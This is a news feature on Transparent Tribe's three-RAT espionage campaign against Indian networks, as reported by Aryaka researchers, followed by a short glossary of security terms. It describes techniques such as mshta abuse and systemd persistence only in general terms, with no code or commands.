Shadow Networks: How Pakistan-Linked Hackers Launched a Triple RAT Siege on India

On a humid Monday morning, as India’s government offices buzzed with routine, invisible adversaries were already at work. Emails - seemingly innocuous - slipped through digital defenses, carrying payloads that would burrow deep into the nation’s most sensitive networks. Behind this onslaught: Transparent Tribe, a Pakistan-linked cyber-espionage group, orchestrating a sophisticated, three-pronged attack that signals a new era of digital intrigue - where the lines between politics, economics, and warfare blur.

Recent investigations by Aryaka’s security team have exposed how Transparent Tribe (APT36) has evolved its toolkit, orchestrating multi-platform campaigns that target not just Windows, but also Linux environments. The first strike uses GETA RAT, a .NET-based tool favored by the SideCopy subgroup. By hijacking trusted Windows utilities - like mshta.exe and XAML deserialization - GETA RAT evades traditional antivirus detection, setting up a durable, covert foothold for long-term surveillance.

Meanwhile, Linux systems are far from immune. The ARES RAT, Python-based and delivered via a Go downloader, profiles infected machines and systematically siphons off data. Its secret? Systemd user services, which allow the malware to persist through reboots and blend with legitimate processes, making it a nightmare for defenders to spot.

The third prong, Desk RAT, is a newer Go-based creation distributed through malicious PowerPoint add-ins. It collects granular system diagnostics and communicates with its operators using WebSocket protocols, ensuring operators maintain a live pulse on compromised machines. Each RAT leverages phishing as an entry point - sometimes through poisoned LNK files, ELF binaries, or script-laden attachments - before deploying payloads that live off the land, abusing built-in system tools to avoid raising alarms.

What emerges is a portrait of modern cyber-espionage: not just shadowy state actors probing for military secrets, but economic rivals seeking competitive advantage. As Aryaka’s Aditya Sood notes, the motivation extends beyond geopolitics; with multi-billion-dollar trade deals at stake, intelligence on defense budgets and procurement plans has become a lucrative target.

The implications are sobering. As the tools of cyberwarfare become more persistent and stealthy, even “friendly” nations may turn their gaze toward one another, driven by the high stakes of global trade. For defenders, the challenge is clear: vigilance must evolve as quickly as the adversaries lurking in the digital shadows.

Conclusion

The Transparent Tribe campaigns mark a pivotal shift in cyber conflict - where espionage, economics, and technology collide. As India and its rivals invest in digital arsenals, the next frontier of competition will be fought not just on borders, but deep within the circuits and code of critical infrastructure. The age of stealthy RATs is here, and the world’s security teams are on notice.

WIKICROOK

• Remote Access Trojan (RAT): A Remote Access Trojan (RAT) is malware that lets attackers secretly control a victim’s computer from anywhere, enabling theft and spying.
• Persistence: Persistence involves techniques used by malware to survive reboots and stay hidden on systems, often by mimicking legitimate processes or updates.
• Living: Living off the Land means attackers use trusted system tools (LOLBins) for malicious actions, making their activities stealthy and hard to detect.
• Phishing: Phishing is a cybercrime where attackers send fake messages to trick users into revealing sensitive data or clicking malicious links.
• Command: A command is an instruction sent to a device or software, often by a C2 server, directing it to perform specific actions, sometimes for malicious purposes.